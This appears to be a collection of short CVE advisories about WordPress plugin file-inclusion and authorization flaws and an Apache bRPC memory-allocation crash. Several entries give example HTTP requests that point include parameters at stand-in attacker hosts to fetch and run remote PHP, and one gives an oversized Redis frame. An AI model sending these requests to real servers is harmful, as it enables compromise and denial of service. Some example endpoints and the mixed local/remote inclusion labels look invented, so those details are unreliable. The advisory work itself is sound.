Author: Ameeba

  • CVE-2025-52716: PHP Local File Inclusion Vulnerability in Acato WP REST Cache

    Overview

    This report outlines a critical vulnerability, CVE-2025-52716, in Acato WP REST Cache that impacts PHP applications. A PHP Remote File Inclusion issue allows for PHP Local File Inclusion, enabling potential attackers to compromise systems or leak data. Cybersecurity teams need to address this vulnerability promptly due to its severity and the potential damage it could cause.

    Vulnerability Summary

    CVE ID: CVE-2025-52716
    Severity: High Risk (CVSS: 7.5)
    Attack Vector: Remote
    Privileges Required: None
    User Interaction: None
    Impact: Potential system compromise and data leakage

    Affected Products

    Product | Affected Versions

    Acato WP REST Cache | Versions up to 2025.1.0

    How the Exploit Works

The CVE-2025-52716 vulnerability arises from improper control of the filename used in an include/require statement in a PHP program. This flaw allows an attacker to manipulate the filename. The weakness class is PHP Remote File Inclusion; in this plugin it results in PHP Local File Inclusion, where the attacker causes the script to include files of their choosing, potentially taking control of the system or causing data leakage.

    Conceptual Example Code

    Below is a conceptual example of how the vulnerability might be exploited:

    GET /wp-rest-cache/vulnerable.php?file=http://attacker.com/malicious.php HTTP/1.1
    Host: target.example.com

    In the example above, the attacker uses a GET request to include a malicious PHP file (`malicious.php`) hosted on their server (`attacker.com`) into the `vulnerable.php` script on the target server (`target.example.com`).

    Mitigation Guidance

    To mitigate this vulnerability, users are advised to apply patches provided by the vendor as soon as they are available. Until a permanent fix is available, users can use a Web Application Firewall (WAF) or Intrusion Detection System (IDS) as a temporary measure to block attempts to exploit this vulnerability.

  • CVE-2025-49271: PHP Remote File Inclusion Vulnerability in GravityWP – Merge Tags

    Overview

    The CVE-2025-49271 is a high-risk vulnerability that has been identified in GravityWP – Merge Tags, a popular WordPress plugin. The flaw lies in the inclusion of PHP files from remote servers, which can potentially lead to system compromise and data leakage. It is crucial for all users and administrators of affected versions of this plugin to take immediate action to mitigate the risk.

    Vulnerability Summary

    CVE ID: CVE-2025-49271
    Severity: High (CVSS: 7.5)
    Attack Vector: Remote
    Privileges Required: Low
    User Interaction: None
    Impact: System compromise and potential data leakage

    Affected Products

    Product | Affected Versions

    GravityWP – Merge Tags | n/a through 1.4.4

    How the Exploit Works

The vulnerability arises from improper control of the filename used in an include/require statement in a PHP program. This allows an attacker to manipulate the filesystem references and include PHP files from remote servers. As a result, an attacker could execute arbitrary PHP code on the server, leading to a complete system compromise.

    Conceptual Example Code

    This is a conceptual example of how the vulnerability might be exploited. The attacker sends a POST request with a malicious PHP file URL included in the request data.

    POST /targeted-endpoint HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    path=http://malicious-site.com/malicious-file.php

    In this scenario, the “path” parameter is improperly controlled, and thus the server ends up including and executing the remote “malicious-file.php”.

    Recommended Mitigation

    Users are advised to apply the vendor patch as soon as it is available to fix this vulnerability. In the meantime, employing a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can serve as a temporary mitigation measure by detecting and blocking attempts to exploit this vulnerability.

  • CVE-2025-49264: PHP Remote File Inclusion Vulnerability in Cloud SAML SSO – Single Sign On Login

    Overview

    An identified vulnerability, CVE-2025-49264, in Cloud Infrastructure Services Cloud SAML SSO – Single Sign On Login, has been found to cause potential system compromise or data leakage. This is due to an improper control of the filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’). The vulnerability affects users of this service and is of significant concern due to the potential for malicious entities to gain unauthorized access.

    Vulnerability Summary

    CVE ID: CVE-2025-49264
    Severity: High (7.5)
    Attack Vector: Network
    Privileges Required: None
    User Interaction: None
    Impact: System compromise and potential data leakage

    Affected Products

    Product | Affected Versions

    Cloud SAML SSO – Single Sign On Login | n/a – 1.0.18

    How the Exploit Works

    The CVE-2025-49264 exploit involves a PHP Remote File Inclusion (RFI) vulnerability, which occurs when an application uses user input to construct a file path for file operations. An attacker can manipulate the input to point to an arbitrary remote file which will be downloaded and executed by the application. This allows an attacker to execute arbitrary code on the system.

    Conceptual Example Code

    Here’s a conceptual example of how an attacker might exploit this vulnerability:

    GET /vulnerable.php?file=http://attacker.com/malicious_file.php HTTP/1.1
    Host: target.example.com

    In this example, the attacker is able to load `malicious_file.php` from their server by manipulating the `file` parameter in the GET request. This remote file could contain code that would be executed by the server, possibly leading to unauthorized access or data leakage.

  • CVE-2025-48332: PHP Remote File Inclusion Vulnerability in PublishPress Gutenberg Blocks

    Overview

    CVE-2025-48332 is a significant vulnerability that affects the PublishPress Gutenberg Blocks in PHP programs. This flaw is due to an improper control of filename for Include/Require Statement, which can allow an attacker to include PHP local files. This vulnerability could potentially lead to system compromise or data leakage, thus posing a significant risk to any platform using affected versions of PublishPress Gutenberg Blocks.

    Vulnerability Summary

    CVE ID: CVE-2025-48332
    Severity: High (7.5 – CVSS Severity Score)
    Attack Vector: Network
    Privileges Required: None
    User Interaction: Required
    Impact: Potential system compromise or data leakage

    Affected Products

    Product | Affected Versions

    PublishPress Gutenberg Blocks | n/a through 3.3.1

    How the Exploit Works

    The vulnerability arises from the improper control of filename for Include/Require Statement in the PHP program. This oversight allows an attacker to exploit the PHP Remote File Inclusion (RFI) vulnerability in the PublishPress Gutenberg Blocks. The attacker can craft malicious PHP files and trick the program into including them. This could grant the attacker unauthorized access to potentially sensitive data or even lead to a full system compromise.

    Conceptual Example Code

    Below is a conceptual example of how the vulnerability might be exploited. In this example, the attacker sends a POST request to the vulnerable endpoint, including a malicious payload in the request body.

    POST /vulnerable/endpoint HTTP/1.1
    Host: target.example.com
    Content-Type: application/php
    { "filename": "http://malicious.example.com/malicious_file.php" }

    In this hypothetical attack, the PHP program would include and execute the malicious_file.php from the attacker’s server, leading to the potential compromise of the system.

    Mitigation

    Users are strongly advised to apply the patch provided by the vendor as soon as possible. Until the patch is applied, using a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can provide temporary mitigation.

  • CVE-2025-3703: PHP Remote File Inclusion Vulnerability in wipeoutmedia CSS & JavaScript Toolbox

    Overview

    The vulnerability identified as CVE-2025-3703 is a serious cybersecurity threat that affects the CSS & JavaScript Toolbox provided by wipeoutmedia. This flaw is related to the improper control of filename in PHP programs, which can be exploited to allow PHP Local File Inclusion. This vulnerability is significant because it may potentially lead to system compromise or data leakage if successfully exploited.

    Vulnerability Summary

    CVE ID: CVE-2025-3703
    Severity: High (7.5 CVSS)
    Attack Vector: Remote
    Privileges Required: Low
    User Interaction: None
    Impact: System compromise and potential data leakage

    Affected Products

    Product | Affected Versions

    wipeoutmedia CSS & JavaScript Toolbox | All versions up to the point at which the issue was discovered

    How the Exploit Works

    The vulnerability is caused by an improper control of filename for include/require statement in PHP programs within the CSS & JavaScript Toolbox. An attacker can exploit this vulnerability by injecting a malicious PHP file into the include/require statement, leading to PHP Local File Inclusion. This allows the attacker to execute malicious scripts on the server, potentially leading to system compromise or data leakage.

    Conceptual Example Code

    Below is a conceptual example of how the vulnerability might be exploited:

    POST /vulnerable/endpoint.php HTTP/1.1
    Host: target.example.com
    Content-Type: application/x-www-form-urlencoded
    include_file=http://attacker.com/malicious_file.php

    In the above example, the attacker sends a POST request to a vulnerable endpoint on the target server. The ‘include_file’ parameter is set to a remote URL hosting the malicious PHP file. Once the request is processed by the server, the malicious PHP file is included and executed, potentially compromising the system.

  • CVE-2025-32288: PHP Remote File Inclusion Vulnerability in stmcan RT-Theme 18 | Extensions

    Overview

    The vulnerability identified as CVE-2025-32288 is a critical security flaw that impacts stmcan RT-Theme 18 Extensions. It involves an Improper Control of Filename for Include/Require Statement in PHP Program, commonly known as PHP Remote File Inclusion. The flaw is of significant concern as it opens a potential gateway for system compromise and data leakage.

    Vulnerability Summary

    CVE ID: CVE-2025-32288
    Severity: High (7.5)
    Attack Vector: Network
    Privileges Required: None
    User Interaction: None
    Impact: System compromise or data leakage

    Affected Products

    Product | Affected Versions

    stmcan RT-Theme 18 Extensions | n/a – 2.4

    How the Exploit Works

    The vulnerability stems from the improper control of filenames for the include/require statement in the PHP program. An attacker can manipulate the filesystem references in PHP applications, causing the application to include a remote file that contains malicious code. This file executes on the server, offering the attacker a chance to compromise the system or leak data.

    Conceptual Example Code

    Here is a conceptual example of how the vulnerability might be exploited:

    GET /index.php?file=http://attacker.com/malicious_file.txt HTTP/1.1
    Host: vulnerablewebsite.com

    In this example, the attacker manipulates the “file” parameter to include a remote file (malicious_file.txt) hosted on their server (attacker.com). When the request is processed, the server fetches and executes the malicious code contained in malicious_file.txt.

    Mitigation

    It is advised to apply the vendor-provided patch as soon as possible. In the interim, a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can be used to mitigate the risk by identifying and blocking attempts to exploit this vulnerability.

  • CVE-2025-31425: Missing Authorization Vulnerability in WP Lead Capturing Pages

    Overview

    The vulnerability identified as CVE-2025-31425 pertains to a Missing Authorization flaw, discovered in a WordPress plugin called WP Lead Capturing Pages. The impact of this vulnerability is significant, potentially leading to system compromise or data leakage. This issue affects a broad range of users, primarily website owners and administrators who utilize this plugin for lead capture purposes.

    Vulnerability Summary

    CVE ID: CVE-2025-31425
    Severity: High (7.5 CVSS v3)
    Attack Vector: Network
    Privileges Required: None
    User Interaction: None
    Impact: System compromise or data leakage

    Affected Products

    Product | Affected Versions

    WP Lead Capturing Pages | Up to 2.3

    How the Exploit Works

    The exploit takes advantage of a flaw in the plugin’s access control configuration. An attacker could send specially crafted requests to the plugin’s functions that are supposed to be restricted to authorized users only. Due to the flaw, the plugin fails to properly validate the user’s authorization, allowing the attacker to perform actions they should not be permitted to execute.

    Conceptual Example Code

    Here is a conceptual example of how this vulnerability might be exploited:

    POST /wp-lead-capturing-pages/function HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/json
    { "malicious_payload": "Exploit Code" }

    In this example, the attacker sends a POST request to a restricted function of the plugin. The malicious payload (“Exploit Code”) is executed because the plugin fails to properly check the user’s authorization level.

    Mitigation

    Website owners and administrators are advised to apply the latest patches provided by the vendor as soon as they become available. In the meantime, it’s recommended to use Web Application Firewalls (WAF) or Intrusion Detection Systems (IDS) as temporary mitigation methods.

  • CVE-2025-30639: Missing Authorization Vulnerability in ThemeAtelier IDonatePro

    Overview

    The CVE-2025-30639 vulnerability pertains to a Missing Authorization issue in the IDonatePro software by ThemeAtelier. This vulnerability can lead to potential system compromise or data leakage due to incorrectly configured access control security levels. It affects all IDonatePro versions up to 2.1.9.

    Vulnerability Summary

    CVE ID: CVE-2025-30639
    Severity: High (CVSS: 7.5)
    Attack Vector: Network
    Privileges Required: None
    User Interaction: None
    Impact: System compromise and potential data leakage

    Affected Products

    Product | Affected Versions

    ThemeAtelier IDonatePro | Up to 2.1.9

    How the Exploit Works

    The exploit takes advantage of the lack of proper authorization checks in IDonatePro. An attacker can bypass the security controls and gain unauthorized access to the system. Once the attacker has access, they can manipulate the data or system processes, leading to system compromise and potential data leakage.

    Conceptual Example Code

    This is a conceptual example of how the vulnerability might be exploited. In this case, an attacker sends a malicious HTTP request to the vulnerable endpoint:

    POST /idonatepro/access HTTP/1.1
    Host: target.example.com
    Content-Type: application/json
    { "admin_override": "true" }

    In the above example, the attacker is trying to gain unauthorized access by sending a POST request with a malicious payload that attempts to override the admin privileges.

    Mitigation and Prevention

    To prevent exploitation of this vulnerability, users should apply the vendor patch as soon as it is available. In the interim, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can help to mitigate the risk. Regular updates and security audits are also recommended to keep the system secure.

  • CVE-2025-24766: PHP Local File Inclusion Vulnerability in WP Royal Themes News Magazine X

    Overview

    The vulnerability CVE-2025-24766 is a critical flaw impacting WP Royal Themes News Magazine X, a widely used WordPress theme. The vulnerability stems from an improper control of filename for Include/Require Statement in PHP Program (PHP Remote File Inclusion). If successfully exploited, it could potentially lead to system compromise or data leakage.

    Vulnerability Summary

    CVE ID: CVE-2025-24766
    Severity: High (CVSS: 7.5)
    Attack Vector: Network
    Privileges Required: Low
    User Interaction: Required
    Impact: System compromise and potential data leakage

    Affected Products

    Product | Affected Versions

    WP Royal Themes News Magazine X | n/a – 1.2.37

    How the Exploit Works

    The vulnerability lies in the improper handling of filenames in PHP Include/Require statements. This makes it possible for an attacker to include files from remote servers, and execute arbitrary PHP code or reveal sensitive information. This is known as a PHP Remote File Inclusion (RFI) exploit.

    Conceptual Example Code

    An attacker could exploit this vulnerability by sending a specially crafted request to the server. This could look something like the following:

    GET /index.php?page=http://maliciouswebsite.com/maliciousfile.txt HTTP/1.1
    Host: target.example.com

    In this example, the `page` parameter is manipulated to include a file from a remote server (`maliciouswebsite.com`). This file (`maliciousfile.txt`) could contain arbitrary PHP code, which would be executed by the server.

    Mitigation

    To mitigate this vulnerability, users should apply the patch provided by the vendor as soon as possible. As a temporary measure, users could also implement a Web Application Firewall (WAF) or Intrusion Detection System (IDS) to block attempts to exploit this vulnerability.

  • CVE-2025-54472: Unlimited Memory Allocation Vulnerability in Apache bRPC

    Overview

    This report discusses the CVE-2025-54472 vulnerability, a severe flaw found in all versions of Apache bRPC before 1.14.1. This vulnerability allows attackers to cause a denial of service by crashing the service. It notably affects those using bRPC as a Redis server to provide network services to untrusted clients, or using bRPC as a Redis client to call untrusted Redis services. The severity of this vulnerability underscores the need for immediate remediation.

    Vulnerability Summary

    CVE ID: CVE-2025-54472
    Severity: High (CVSS: 7.5)
    Attack Vector: Network
    Privileges Required: None
    User Interaction: None
    Impact: Potential system compromise or data leakage

    Affected Products

    Product | Affected Versions

    Apache bRPC | < 1.14.1

    How the Exploit Works

    The vulnerability lies within the bRPC Redis protocol parser code, which allocates memory for arrays or strings based on integers read from the network. If an unusually large integer is read, the allocation may fail with a std::bad_alloc error, leading to a program crash. An attacker can exploit this weakness by sending specially crafted data packets to the bRPC service, causing a denial of service. Version 1.14.0 attempted a fix by limiting the memory allocation size, but due to an integer overflow in the limit-checking code, this version remains vulnerable.

    Conceptual Example Code

    While this is not real code, it serves as a conceptual example of how the vulnerability might be exploited, by sending a large size value (e.g., 9999999999) as part of a Redis command:

    POST /brpc/redis/command HTTP/1.1
    Host: target.example.com
    Content-Type: application/redis
    *3\r\n$3\r\nSET\r\n$5\r\nmykey\r\n$9999999999\r\nmyvalue\r\n

    The above example would cause the server to attempt to allocate an exorbitant amount of memory, leading to a crash.

    Possible Mitigations

    Two primary mitigation steps are recommended:
    1. Upgrade Apache bRPC to version 1.14.1. This latest version includes a patch that addresses the vulnerability.
    2. Alternatively, apply the patch manually as provided here: https://github.com/apache/brpc/pull/3050.
    In either case, the patch limits the maximum length of memory allocated each time in the bRPC Redis parser to a default of 64MB. If your Redis request or response exceeds this size, you might encounter an error after the upgrade. Adjust the `redis_max_allocation_size` gflag to a larger limit if necessary.
    As a temporary solution, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can help prevent exploitation of this vulnerability.
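    As an added illustration of the parser-side defence described above (this is not bRPC's code and not the patch in the linked pull request), the C++ below reads a RESP bulk-string length header, rejects digit strings that would wrap the integer, and applies a 64MB cap before any arithmetic on the untrusted value; beside it is a limit check of the kind that integer wraparound defeats. The function names and the `kMaxAllocation` constant are assumptions for this example.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Cap on a single allocation, using the 64MB default the report attributes to
// the patch. The name and value are assumptions for this illustration.
static const uint64_t kMaxAllocation = 64ull * 1024 * 1024;
static const uint64_t kU64Max = ~(uint64_t)0;

// Parse a RESP bulk-string header "$<len>\r\n" at p (n bytes available).
// Returns true and sets *len and *consumed only for a well-formed header
// whose decimal length fits in uint64_t without wrapping.
bool parse_bulk_len(const char* p, size_t n, uint64_t* len, size_t* consumed) {
    if (n < 4 || p[0] != '$') return false;
    uint64_t v = 0;
    size_t i = 1;
    bool have_digit = false;
    for (; i < n && p[i] >= '0' && p[i] <= '9'; ++i) {
        uint64_t d = (uint64_t)(p[i] - '0');
        // Reject before v*10 + d could wrap around uint64_t.
        if (v > (kU64Max - d) / 10) return false;
        v = v * 10 + d;
        have_digit = true;
    }
    if (!have_digit || i + 1 >= n || p[i] != '\r' || p[i + 1] != '\n') return false;
    *len = v;
    *consumed = i + 2;
    return true;
}

// A limit check of the kind the report says overflow defeats: the "+2" for the
// trailing CRLF is computed in a 32-bit type, so a length just below 2^32 wraps
// to a tiny value and passes. Illustrative only; not taken from bRPC.
bool naive_check(uint64_t len) {
    uint32_t needed = (uint32_t)len + 2;
    return needed <= kMaxAllocation;
}

// Overflow-safe form: compare the untrusted value first, do arithmetic after.
bool safe_check(uint64_t len) {
    return len <= kMaxAllocation;  // len + 2 cannot wrap once this holds
}

// Classify a NUL-terminated header: 0 = malformed or unparsable,
// 1 = accepted, 2 = parses but exceeds the allocation cap.
int classify_header(const char* frame) {
    uint64_t len = 0;
    size_t used = 0;
    if (!parse_bulk_len(frame, strlen(frame), &len, &used)) return 0;
    return safe_check(len) ? 1 : 2;
}
```

    With this check in place, the `$9999999999` header from the conceptual example above is rejected before any allocation is attempted, and a 20-digit length that does not fit in 64 bits is rejected while parsing.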
